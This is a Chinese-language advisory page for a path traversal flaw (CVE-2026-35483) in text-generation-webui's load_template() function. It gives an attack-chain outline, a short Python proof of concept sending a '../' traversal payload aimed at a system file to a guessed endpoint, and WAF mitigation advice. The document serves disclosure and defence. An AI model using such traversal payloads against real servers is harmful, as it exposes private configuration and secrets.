CVE-2026-35483 CVSS 5.3 中危

CVE-2026-35483 text-generation-webui路径遍历漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35483

漏洞类型

路径遍历

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

text-generation-webui

漏洞概述

text-generation-webui 在 4.3 版本之前存在路径遍历漏洞。未经身份验证的攻击者利用 `load_template()` 函数，可读取服务器上任意位置的 .jinja、.jinja2、.yaml 或 .yml 文件。其中 .jinja 文件内容会直接返回，而 .yaml 文件则会提取解析后的键值。该漏洞可能导致服务器敏感配置信息泄露，建议尽快修复。

技术细节

该漏洞根源于 `load_template()` 函数未对用户输入的路径参数进行严格的校验和规范化处理。攻击者可以通过构造包含 `../` 序列的恶意 HTTP 请求，绕过目录限制，访问服务器文件系统上的任意位置。尽管代码逻辑中存在扩展名限制（仅允许读取 .jinja, .jinja2, .yaml, .yml），但这依然构成了严重的信息泄露风险。
攻击者若能定位到包含敏感信息的配置文件（如数据库连接信息的 .yaml 文件或包含密钥的 .jinja 模板文件），即可直接获取其内容。对于 .jinja 文件，系统返回原始文本；对于 .yaml 文件，系统返回解析后的键值对。由于该漏洞无需用户交互且无需身份验证（PR:N），任何能够访问 Web 服务的攻击者均可利用此漏洞读取敏感数据，对系统安全性构成威胁。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在运行 text-generation-webui 服务，并确定其版本低于 4.3。

STEP 2

武器化

攻击者构造包含路径遍历序列（如 "../"）的恶意参数，并附加允许的文件扩展名（如 .yaml），指向服务器上的敏感文件路径。

STEP 3

投递

攻击者向服务器发送包含恶意参数的 HTTP GET 请求，调用 `load_template()` 接口。

STEP 4

利用

服务器端 `load_template()` 函数未正确过滤路径，读取了指定位置的文件内容。

STEP 5

窃取

服务器将文件内容（或解析后的键值）返回给攻击者，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL example
# The specific endpoint might vary based on deployment
target_url = "http://localhost:5000/api/load_template"

# Malicious payload attempting to read a config file using path traversal
# Note: The vulnerability requires specific extensions (.yaml, .jinja, etc.)
payload = {
    "template": "../../../../etc/passwd.yaml" 
}

try:
    response = requests.get(target_url, params=payload)
    if response.status_code == 200:
        print("[+] Request successful, checking content...")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

text-generation-webui < 4.3

防御指南

临时缓解措施

如果无法立即升级，建议通过 Web 应用防火墙（WAF）添加规则，拦截请求参数中包含 '../'、'%2e%2e' 或绝对路径符号的数据包。同时，检查服务器上是否存在非预期的 .yaml 或 .jinja 敏感文件，并将其移出 Web 根目录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表